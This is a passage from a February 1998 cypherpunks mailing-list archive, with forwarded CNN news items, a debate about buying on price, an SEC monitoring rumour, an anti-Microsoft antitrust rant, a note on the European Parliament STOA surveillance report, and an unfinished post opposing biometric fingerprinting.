> Date: Wed, 4 Feb 1998 17:07:19 -0500
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Re: The Continued Attack on Cash (Was: "The Right of 
>  Anonymity"...)

> >     1.  those who buy for price alone are this man's lawful prey.
> 
> Those who *don't* buy for price alone are usually somebody's lunch sooner
> or later.

There is *always* somebody higher up the foodchain. No matter how big or
tough sooner or later you end up somebodies lunch. Price is irrelevant
except in regards the time frame.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 06:40:56 +0800
To: users@ssz.com (SSZ User Mail List)
Subject: IBM cpu breaks 1GHz barrier [CNN]
Message-ID: <199802042241.QAA06983@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    IBM breaks 1,000 MHz
>    
>    More related sites... NEW YORK (CNNfn) - Engineers at an International
>    Business Machines Corp. research facility in Austin, Texas, Wednesday
>    demonstrated the world's first computer chip to break the 1,000 MHz
>    barrier.
>    [INLINE] The chip operates at 1 billion cycles per second. The fastest
>    commercial microprocessors today operate at around 300 MHz. However,
>    computer users won't be able to run out and buy a PC containing the
>    chip anytime soon. IBM isn't expected to make it available
>    commercially for at least two years.
>    [INLINE] The news comes just days after rival Digital Equipment
>    introduced a new version of its Alpha chip that it said would break
>    the 1,000 MHz barrier. Digital Equipment, which hasn't yet hit that
>    mark, also said it would take at least two years for the chip to be
>    available.
>    [INLINE] IBM will issue a research paper detailing the chip, along
>    with two related microprocessor papers, at the International Solid
>    State Circuit Conference in San Francisco Friday.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 06:44:26 +0800
To: users@ssz.com (SSZ User Mail List)
Subject: IRS Technology Chief Resigns [CNN]
Message-ID: <199802042242.QAA07077@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    
>                         IRS TECHNOLOGY CHIEF TO RESIGN
>                                        
>      
>      WASHINGTON (AP) -- Arthur Gross, the IRS official heading efforts to
>      update the agency's outmoded computer systems, plans to leave the
>      agency this spring.
>      
>      Gross, chief information officer at the IRS, won wide respect from
>      congressional Republicans for his computer modernization efforts
>      even as they grilled the agency for mistreatment of taxpayers last
>      year.
>      
>      He announced his plans to resign Tuesday.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 06:44:47 +0800
To: users@ssz.com (SSZ User Mail List)
Subject: Pepsi a tad anal? [CNN]
Message-ID: <199802042243.QAA07160@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                    DRINKING THE COMPETITION LEADS TO LAWSUIT
>                                        
>      POMONA, California (AP) -- Just because he delivers Pepsi doesn't
>      mean he has to drink it.
>      
>      Michael Dillon has filed a discrimination lawsuit against the
>      soft-drink giant after he was reprimanded for drinking Gatorade on
>      the job and was publicly chastised for drinking a non-Pepsi product
>      during a meeting.
>      
>      Dillon says both claims invaded his privacy.
>      
>      A spokesman for Pepsi says the company doesn't forbid workers from
>      downing other soft drinks, but expects them to be team players when
>      it comes to being loyal.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Thu, 5 Feb 1998 05:58:34 +0800
To: "'declan@well.com>
Subject: FW: SEC Rule Announcement
Message-ID: <6B5344C210C7D011835C0000F8012766010035B2@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



I haven't been able to confirm this report.
Note that it refers to monitoring employee's
HOME computers.

Peter Trei

> -----Original Message-----
> From:	Larry Layten [SMTP:larry@ljl.com]
> Sent:	Wednesday, February 04, 1998 11:04 AM
> To:	cryptography@c2.net
> Subject:	SEC Rule Announcement
> 
> I received information in an Electronic Mail Association (EMA)
> bulletin that said the Securities and Exchange Commission 
> approved a rule that would go into effect February 15th that 
> requires securities employers to have the ability to monitor 
> electronic communications between employees and customers 
> on employees' home computers or through third party systems.
> 
> Does anyone have any more information on this and how it 
> might apply to encrypted email?
> 
> Larry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 06:45:54 +0800
To: users@ssz.com (SSZ User Mail List)
Subject: Yeltsin: Clinton to cause next World War? [CNN]
Message-ID: <199802042244.QAA07241@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>      
>              YELTSIN: CLINTON'S IRAQ ACTIONS COULD CAUSE WORLD WAR
>                                        
>       Yeltsin Yeltsin warns Clinton against use of force in
>      Iraq  February 4, 1998
>      Web posted at: 11:52 a.m. EST (1652 GMT)
>      
>      MOSCOW (CNN) -- Russian President Boris Yeltsin on Wednesday issued
>      the Kremlin's strongest criticism yet of U.S. threats to launch
>      military strikes against Iraq, saying such action could trigger
>      another world war.
>      
>      "By his actions, (U.S. President Bill) Clinton might run into a
>      world war," a somber Yeltsin said at a televised meeting in the
>      Russian capital.
>      
>      "He is behaving too loudly on this -- too loudly", Yeltsin said. And
>      he added, "Well, now (some are saying) let us flood it all with
>      planes and bombs. No, frankly speaking, it is not like Clinton at
>      all."
>      
>      "One must be more careful in this world saturated with allsorts of
>      weapons which are sometimes in terrorists' hands," the Kremlin chief
>      said, occasionally gripping his desktop andgrimacing. "It's all very
>      dangerous."


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Thu, 5 Feb 1998 06:21:50 +0800
To: "'declan@well.com>
Subject: FW: SEC Rule Announcement
Message-ID: <6B5344C210C7D011835C0000F8012766010035B3@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



[sorry if you get this twice - pt]

I have not been able to confirm the claim in this letter - the EMA
does not seem to have a web site. Note that it refers to 
employers monitoring employee's HOME computers.

Peter Trei

> -----Original Message-----
> From:	Larry Layten [SMTP:larry@ljl.com]
> Sent:	Wednesday, February 04, 1998 11:04 AM
> To:	cryptography@c2.net
> Subject:	SEC Rule Announcement
> 
> I received information in an Electronic Mail Association (EMA)
> bulletin that said the Securities and Exchange Commission 
> approved a rule that would go into effect February 15th that 
> requires securities employers to have the ability to monitor 
> electronic communications between employees and customers 
> on employees' home computers or through third party systems.
> 
> Does anyone have any more information on this and how it 
> might apply to encrypted email?
> 
> Larry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 5 Feb 1998 06:19:04 +0800
To: "Attila T. Hun" <unicorn@schloss.li
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)
In-Reply-To: <v04003a0eb0fce6005c81@[139.167.130.248]>
Message-ID: <v04003a1bb0fe96190f31@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:56 pm -0500 on 2/4/98, Attila T. Hun wrote:


>         "Americans do not buy for quality, they buy for price"


Which must explain our gross national product, then. Cheaper, as always,
*is* better.


>
>     as John Ruskin said:
>
>     1.  those who buy for price alone are this man's lawful prey.

Those who *don't* buy for price alone are usually somebody's lunch sooner
or later.


>     2.  the price of oats is significantly cheaper when it has been
>         processed by the horse.

It ain't oats, then. It's horseshit. Aparently aristocratic horseshit, if I
remember Mr. Ruskin's bio right...

;-).

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 5 Feb 1998 01:51:11 +0800
To: cypherpunks@cyberpass.net
Subject: Internic may be required to return money
Message-ID: <199802041740.SAA28340@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Holy shit.

>
>         Court: Domain fees appear illegal
>         By Brock N. Meeks
>
>         WASHINGTON, Feb. 2 - A federal court Monday issued a
>         temporary injunction barring the federal government from
>         spending some $50 million it has collected from the
>         registration of Internet domain names. That money forms a
>         pool of funds intended to be spent for improving the
>         Internet. On Monday, the court sided with the plaintiffs in a
>         lawsuit that claims those fees constitute an illegal tax. 
>
>         The money is part of a so-called "intellectual infrastructure
>         fund," which is funded by 30 percent of all fees paid to
>         register an Internet domain name. Initial domain names cost
>         $100; renewal of domain names is $50 annually. The
>         remainder of registration fees goes to Network Solutions
>         Inc. (NSOL) to cover its cost of maintaining the registration
>         service. 
>
>         Network Solutions operates as a monopoly, stemming from
>         a National Science Foundation government grant. That
>         grant is supposed to end in March; the White House issued
>         a proposal Jan. 30 that would move domain name
>         registration into the private sector. 
>
>         In October, six domain-name holders filed suit in U.S.
>         District Court alleging that the National Science Foundation
>         had no authority to allow Network Solutions to collect any
>         money in excess of its cost of providing the registration
>         service. Further, the suit charged, the 30 percent
>         set-aside amounts to an unconstitutional tax. 
>
>         Judge Thomas Hogan said Monday that the plaintiffs "have
>         made a significant showing that the (intellectual
>         infrastructure fund) is an illegal tax." 
>
>         Hogan said there is "no litmus paper onto which the Court
>         can drop a regulatory assessment such as this one, hoping
>         to see whether the paper comes up blue for tax or pink for
>         fee." Justice Department lawyers had argued in court that
>         the domain-name registration fee was exactly that, a fee,
>         because it was paid voluntarily and therefore couldn't be
>         considered a tax. 
>
>         But Hogan disagreed, writing that "there is no dispute that
>         the assessment (registration fee) is involuntary - it is
>         automatically charged to every domain registration." 
>
>         In 1995 Network Solution's contract was amended to allow
>         it to begin collecting fees for the registration process,
>         which it had done for free since 1993, when its contract
>         was issued. The registration fees set off a firestorm of
>         criticism in the Internet community. The Intellectual
>         Infrastructure Fund was supposed to be used for the
>         betterment of the Internet for the community as a whole;
>         however, no plan has ever developed on how to spend the
>         money, which is held in escrow. 
>
>         Because no plan had been developed to spend the fund
>         money, Congress rushed into the vacuum late last year
>         and simply appropriated some $23 million. Congress
>         earmarked that money to be spent on the Next Generation
>         Internet project, which President Bill Clinton highlighted in
>         his recent State of the Union speech. 
>
>         "Under federal law, no independent executive agency -
>         such as the National Science Foundation - can collect
>         fees that exceed the cost of providing the service they are
>         administering," said William Bode, attorney for the plaintiffs.
>         "NSI, the agent of NSF, spends less than $5 to register
>         domain names, yet it charges a registration fee of $100 and
>         renewal fees of $50 per year," he said. 
>
>         Network Solutions did not return calls for comment. 
>
>         Bode also argued that only Congress has the authority to
>         tax and that no such authorization has taken place. The
>         Justice Department argued that because Congress
>         appropriated the $23 million from the infrastructure fund, it
>         had essentially ratified the tax. 
>
>         Bode argued that ratification of a tax can't take place in
>         authorization bills. Judge Hogan agreed, noting that
>         ratification is a legislative function and that "it is well known
>         that Congress does not normally legislate through
>         appropriations bills." Hogan added: "Congress may have
>         intended to grant NSF the authority to collect the
>         assessment, but it has not effected a legal ratification." 
>
>         The suit also is seeking antitrust damages, alleging that the
>         NSF violated the competition in contracting act when it
>         allowed Network Solutions to begin collecting the $100 fee.
>         Bode says the competition act requires the NSF to re-bid a
>         new contract, not simply amend it. 
>
>         The temporary injunction "paves the way for our motion,
>         which we'll file in two days, to require NSI to return all
>         registration renewal fees which exceed the cost of
>         providing that service," attorney Bode said. "We think that
>         cost [to NSI for the registration process] is significantly less
>         than $10, probably $2 to $3," he said, "which would mean
>         that there would be a refund of approximately $100 million
>         in our judgment." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert H Guttman <guttman@media.mit.edu>
Date: Thu, 5 Feb 1998 07:54:18 +0800
To: "Robert Hettinga" <unicorn@schloss.li>
Subject: Re: The Continued Attack on Cash (Was: "The Right of  Anonymity"...)
Message-ID: <199802042348.SAA17496@ml.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



> > "Americans do not buy for quality, they buy for price"
> 
> Which must explain our gross national product, then. Cheaper,
> as always, *is* better.
> 
> > as John Ruskin said:
> >  1.  those who buy for price alone are this man's lawful prey.
> 
> Those who *don't* buy for price alone are usually somebody's
> lunch sooner or later.

I somehow missed the full thread on this topic, but I disagree
that "cheaper, as always, *is* better."  There are many markets
and situations where people (Americans included) shop by "value"
(perceived or otherwise), not just price.  This is what VARs and
"branding" are about and what enables market power.

For example, Gerry Heller, CEO of FastParts - an online auction
for semiconductors, was quoted in a recent Forrester Research
report as admitting that even in this commodity-like market
"availability is more important than price" when it comes to
auctioning semiconductors.

- Rob



-----------------------------------------------------------------
Robert H Guttman                               voice:617-253-9603
mailto:guttman@media.mit.edu                 MIT Media Laboratory
http://www.media.mit.edu/~guttman           Software Agents Group
http://ecommerce.media.mit.edu/         Agent-mediated E-Commerce
-----------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Thu, 5 Feb 1998 05:04:25 +0800
To: Tim May <cypherpunks@cyberpass.net>
Subject: Re: the best justice money can buy --Lessig suspended
In-Reply-To: <v03102802b0fd25414459@[207.167.93.63]>
Message-ID: <19980204.181907.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980203:1222, in <v03102802b0fd25414459@[207.167.93.63]>, 
    Tim May <tcmay@got.net> was purported to have 
    expostulated to perpetuate an opinion:

>As for Attila's calls to break up MS...could make Bill Gates immensely
>wealthier, as he'd then have a piece of the 5 most successful software
>companies!

    after they extract the usual treble damages in antitrust
    litigation, Bill will probably retain significant
    assets, but he probably would not top the list of the
    very wealthy, and might not even make it.

>(I assume Attila is not arguing for simply seizing his property and
>giving it to others, or running it as a government company, or just
>padlocking the doors....)

    no, in fact, if there were a free market remedy for M$'
    monopoly, I would be in favour of it --and there is _no_
    free market remedy and failure to act promptly 
    conceivably wipe out all, or virtually all, of the 
    viable competitors.

    the purpose of antitrust legislation is solely to
    remedy an injustice caused by a private market segment
    which became a monopoly.  divestiture for M$ would
    generally be along the lines of AT&T except it would
    focus on divisions rather than regions; secondly, it
    would obviously restrict Gate$ involvement in more than
    one despite any stock ownership and might require Bill:

    a)  to sell all stock in units he does not control;

    b)  take his payout in stock from one unit only (less
        negative market); or,

    c)  he may not have enough left after Sherman Act 
        penalties to be a major stockholder --he might
        actually need to suffer through stockholders
        meetings like the rest of the CEOs.

    I would never advocate seizing assets for redistribution
    vis a vis Mugabe or whatever the despot's name is --what
    a waste-- if uncle Sam redistributed we would have
    Microsoft-Harlem, Microsoft-Watts, etc.  shit, I had to
    stop typing after the mirth of that thought!

    as for the government running _anything_ --how far do we
    need to look for the nearest government excess and total
    mismanagement, featherbedding, and corruption?  not far
    (you, Tim, on a non-clear day cant see very much from
    your hilltop --out here on the high desert ridges in So.
    Utah it is CAVU the vast majority of the time-- and I
    still cant see any as Feds are like Revenuers in KY).

    there are multiple issues:

    1.  Microsoft's almost good enough (for the market) 
        operating systems which probably should be 
        considered what we called firmware 25 years ago.  at
        this point >90% of the platforms run M$ in one form
        or another and as you acknowledge, SGI, DEC, and so
        on are all hedging their bets --which will become
        reality as soon as they open the floodgates. 

        in software, the sheeple follow the Judas goat to
        Redmond.

    2.  Microsoft "software"

        a)  office suite  --already 95% of desktop market

        b)  data base --maybe should be included in a) but
            Oracle, Sybase, IBM, etc have large installed 
            bases at a much higher cost per unit on servers

        c)  browser --certainly will be at 80% before year
            end as all OEMs so far have indicated they will 
            not cross M$ and switch. that leaves the rest of
            it up to the ISPs who could care less.

        d)  back office  --M$ moving in on this one real
            fast and it is now part of NT distribution-- 
            which then requires the browser and webserver
            for installation and maintenance.

        e)  web servers, firewalls, routers, etc.  --M$ is
            already getting the web servers with NT
            distributions and is poised to tackle firewalls
            and router dominance.  I question that they can
            ever configure NT on any hardware to do
            routing/switching effectively, efficiently, or
            competitively against dedicated hardware given 
            the new >1G switches.

    3.  M$ in cable systems.  cable systems are always cash
        poor from infrastructure expense.  M$ is buying in 
        and therefore influencing the choice of settops
        --and their format-- witness TCI. this further
        establishes M$ in the determination of standards
        --obviously to the detriment of everyone else-- and
        the FCC has mandated the boxes must be compatible
        across the board in a couple years and we all know
        who negotiates dirty and hard

        the only saviour in this one may be Time-Warner
        which so far is moving ahead with its 2way cable 
        system from Scientific Atlanta with a sparc chip,
        etc.  T-W has 2.5 million boxes on order and is
        planning extensive deployment 3rd quarter which 
        is at least 12 months before M$ can even beta test
        with TCI 

    4.  content...

        a)  msn which so far is harmless, but what would
            happen if Gate$ absorbed Assholes on Line?  or 
            really pushed MSN at POS and OEM.

        b)  msnbc which apparently still enjoys editorial
            censorship only from the usual channels of our 
            non-free press.

        c)  reference bookshelf in which the latest revision
            of the EnCarta encyclopediae described Gate$ as 
            a "philanthropist"  --cheap son of bitch only 
            coughed $100 million towards school internet as
            long as it was M$ product. he may have been
            better termed a misogynist (before he was
            married) given his terms of usage....

        content is where we really start to worry more than
        Bill's money, which has already bought influence: 
        the WSJ editorial page article by Bill striking back
        at the DOJ, the NYTimes column, the books, and the
        rest of the demigod worshipping media.

    Gate$' fortunes have been changing:  Gate$ now has for
    more enemies than his money can buy friends.  even the
    SPA has turned against him with their white paper on
    fair competition which is a direct shot across Gate$'
    bow --and Gate$' response was that their membership in
    SPA might not be renewed in August --economic threat. 
    The DOJ has expanded their scope and will probably file
    significant actions shortly (hopefully before the 21 Apr
    appeals court hearing)

    next are the states, eleven so far including NY, TX, IL 
    and CA where they have very definitely aggressive AGs. 
    and CA's is pissed over the sweetheart deal the CSU
    system gave M$ to supply everything as the "official
    vendor" of the CSU system which has 20+ campi and how
    many million students?

    complain about a McDonalds' generation?  shit, that's 
    only your stomach, not your mind --and at least there
    are other choices for food --I personally have never
    eaten at McDonalds; of course, that does not say much as
    I have never owned a television, either.

    we already have an M$ generation.  they all learned on 
    PCs and they all programmed to PCs and windows with
    their private APIs.  this is exactly what creating a
    positive feedback, self-enhancing market place does: 
    McDonalds grabbed their stomachs with their playgrounds,
    etc. and M$ twists their minds.

    BOTTOM LINE:  Gate$ manipulation, scheming, red-dog
    contracts, etc.  make Cornelius Vanderbilt look like a
    choir boy.  Gate$ style of management with Steve Ballmer
    as the heavy and Gate$ trying to cover his geekness as
    the "aw shucks" boy next door has had the curtain pulled
    to show what technically amounts to a legal "conspiracy"
    to dominate multiple markets, both vertically and
    horizontally.

    as such, M$ and their executives actions fall directly
    under the guidelines of part B of the Sherman Antitrust
    act which includes the usual penalties of divestiture,
    treble damages, and _criminal_ penalties.  secondly, M$
    and Gate$, if convicted of violating part 2, could then
    be construed as a "corrupt" meaning malicious intent

        the difference between misfeasance and malfeasance
        is that in the latter you were intentionally fucked

    which qualifies for RICO prosecution as well.  in 
    addition to the extremely severe criminal penalties, RICO
    does provide for confiscation of ill gotten assets
    --this would apply to Gate$ monetary gains, including
    his stock, which could be forfeited.

    frankly, I think it would be most amusing to see Gate$
    and Ballmer receiving the customary "3 hots and a cot"
    for such offenders and to need to work for a living like
    the rest of us when they earn their freedom.

    the fact that RICO could apply does not mean that it 
    will be trundled out --but it would be fitting justice. 

    I will never denigrate Gate$ determination to build M$
    and to proliferate the computer, which he did, a little
    too well.

    --but Gate$ crossed the line:

    Gate$' instinct set him on the path that competition
    means forcing everyone and their ideas (those that he
    did not steal, literally or figuratively) from the 
    marketplace --Bill can not compete; he must "own" the
    market.  William Henry Gates III expects to be crowned
    "William III" --see my rant on 16 Oct.  on DejaVu or:
 
      http://www.primenet.com/~attila/rants/gates/7a16-ms_monopoly.html

    not to be crass about it, but Gate$ has served his 
    purpose and outlived his usefulness --his defense
    against the DOJ, his further market actions while under
    attack, and his intent to trump the moot with Win98 are
    actions of a petty dictator; give Bill a shiny new
    uniform from a Napoleanic banana republic and let him
    prance around.

    any more of Gate$ not only becomes tiresome, but 
    hazardous to our health.  give me the hook...

    there is no free market remedy for M$' control of the
    market place as the consumer will not boycott something
    which a) costs them money do so; and, b) for which there
    is no ready substitute. the only alternative is to apply
    the anti-trust laws in the general interests of 
    society which does not mean government ownership or
    management.

    M$ stockholders may either make or lose money depending
    on the valuations the market assigns to each of the 
    divested divisions --but that is a risk you take in the
    market if your greed exceeds your wisdom. ask any VC, 
    whose greed is only exceeded by his fear.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNjTgbR8UA6T6u61AQE9SAH/ZE9BRgenWbxD1mFsqj6qgHJ3hzKXbT6l
wpDQd5U3sFje7QEMLVS7KzTRXLchMF+JYcHeuiB3hV3dmCCG7n8yRA==
=JspT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Feb 1998 08:27:31 +0800
To: cypherpunks@toad.com
Subject: STOA Assessment of Techno-Control
Message-ID: <1.5.4.32.19980205002157.006c1454@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



We've transcribed the Euro-Parliament STOA report, 
"An Appraisal of the Technologies of Political Control," 
6 January 1998, a portion of which was offered earlier
by Axel Horns and Ulf Mller.

   http://jya.com/stoa-atpc.htm  (295K text + 210K images)

Zipped version:

   http://jya.com/stoa-atpc.zip  (314K)

It's a grim assessment, revealing more than most of us want to 
face about the dark side of high technology, especially what 
the most technologically advanced nations are deploying, and 
building to sell to the worst of humanity, and how export laws 
are flaunted to cut criminal deals in defiance of high-minded law 
and public policy.

It demonstrates that he national security heritage continues, 
sharing military technology with governmental outlaws around 
the globe.

And the US is leading the market.

It would be cathartic for this report was widely read, pondered,
then acted upon, in the US and globally. Kudos to the European 
Parliament for sponsoring it. And congratulations to the authors 
and the beleaguered organizations who've been trying for years
to diminish this over civilized madness, to jolt us out of 
techno-narcosis.

There's much in the report that's been discussed here, and much
more that has not but deserves to be.

The full report is 112 pages, 50 pages of main body, 13
pages of notes and 25 pages of bibliography. We've
not yet transcribed the detailed bibliography.

As noted earlier, the contents are:

Abstract
Executive Summary
Acknowledgements
Tables and Charts
1  Introduction
2  Role and Function of Political Control Technologies 
3  Recent Trends and Innovations
4  Developments in Surveillance Technology 
5  Innovations in Crowd Control Weapons 
6  New Prison Control Systems 
7  Interrogation, Torture Techniques and Technologies             
8  Regulation of Horizontal Proliferation 
9  Conclusions
10 Notes and References
11 Bibliography [Not yet transcribed]
Appendix 1. Military, Security & Police Fairs. [Not provided with report]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 10:14:44 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Sun takes over Netscape? [CNN]
Message-ID: <199802050211.UAA00178@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    February 4, 1998: 7:27 p.m. ET
>    
>    More related sites... NEW YORK (CNNfn) - Shares of Netscape
>    Communications Corp. shot up Wednesday amid rumors that the company is
>    being eyed as a possible takeover target by Sun Microsystems Inc.
>    [INLINE] The takeover scuttlebut drove Netscape (NSCP) stock up 1-1/16
>    to 19-1/4 in active trading. The surge capped a four-day trading
>    period in which the Internet software company's shares have jumped
>    roughly 20 percent from a Friday close of 16-1/16.
>    [INLINE] Despite the leap, Netscape stock remains sharply down in
>    1998, having dropped nearly 20 percent in the first 23 trading days of
>    the year.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 5 Feb 1998 10:36:03 +0800
To: cypherpunks@toad.com
Subject: Re:  Fingerprinting in CA [was Whoa: British SmartCard rollout]
Message-ID: <199802050220.VAA21403@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



How come there is no organized opposition to fingerprinting
everyone in the nation? [U.S.-centric talk, but applies to Britain too]

There was just a news report on "KidsSafe", a smartcard for holding
kids' health details for an emergency. "Eventually, they won't have
to carry the card, we can instantly look up the information from
their fingerprints".

Excerpts from the Cryptography Manifesto follows...

BTW, it's finally online! I need to update it for the past
6 months of activity, but...

   http://www.erols.com/paulwolf/cointelpro/cointel.htm  (scroll down)

----

Fingerprinting everyone in the USA - nay, the planet - is a known plot
by the NSA: see (the 2nd) "The Body as Password" below.

Are we all going to silently roll over and accept this NSA crap???

It's our tax money, but we NEVER got to vote on it.

How about some cypherpunk with money challenging it on the
basis shown below of violating Privacy Act of 1974?
---guy




Sure, government can give debate reasons for requiring fingerprinting
for driver's licenses...

But it is still a violation of the minimization requirement of the Privacy
Act of 1974.

Biometric data on citizens is FAR BEYOND any reason government can give.

Notice how no citizens in any state ever got to vote on such an important
escalation of personal data collection by the government.

Indeed, it seems to be accomplished in the quietest way possible, giving
citizens the least amount of opportunity to choose their fate.

Odd, since tax-payer paid-for government services is what gives them the power.

But elected representatives will do, you say?

Did you hear any of them mention it during campaigning?

Did Alabama elected officials even mention it with their press
release of a new driver's license, despite that being the plan?

No.

What does that tell you?

We need a cabinet-level Privacy Commission,
with the power to intervene nationwide.

Power to protect us little people from fanatical personal data collection.

We are losing it piece by piece.

Who would have thought the United States would
collect fingerprints from all citizens?

This is the main way our Federal Government is rolling out the National ID
Card, using a Universal Biometric Card: driver's licenses.
 
Divide and Conquer, state by state.
 
It is the beginning of the end.
 
Don't think the biometric driver's licenses are the exact equivalent of a
National ID Card? Check out this phrasing from an unimplemented law:
 
#   Privacy Journal, By Robert Ellis Smith, October 1983 issue
#
#   Senator Bob Dole wants the government to conduct a three-year study to
#   unify federal and local requirements for personal identity.
#
#   The bill, S1706, would amend the Federal False Id Act of 1982, to require
#   a comprehensive identity scheme for the U.S., either THROUGH UPDATING
#   EXISTING IDs TO BE MORE SECURE, UNIFYING THEM, or creating a new identity
#   document for all Americans.


Collect biometric information from everyone...
law enforcement's Evil Holy Grail.

*   "U.S. Has Plan to Broaden Availability tests of DNA Testing"
*   By Fox Butterfield, The New York Times, undated but 1996 implied.
*   
*   In a little known provision of the Clinton Administration's 1994 Crime
*   Control Act was a call for the establishment of a nationwide DNA data
*   bank like the current national system for fingerprints, run by the FBI.
*   
*   In the two years since then, 42 states have passed laws requiring prison
*   inmates give blood or saliva samples for a "DNA fingerprint."
*   
*   In a report today, the Justice Department said it is stepping up efforts
*   to make such DNA biometric capture "as common as fingerprinting" and that
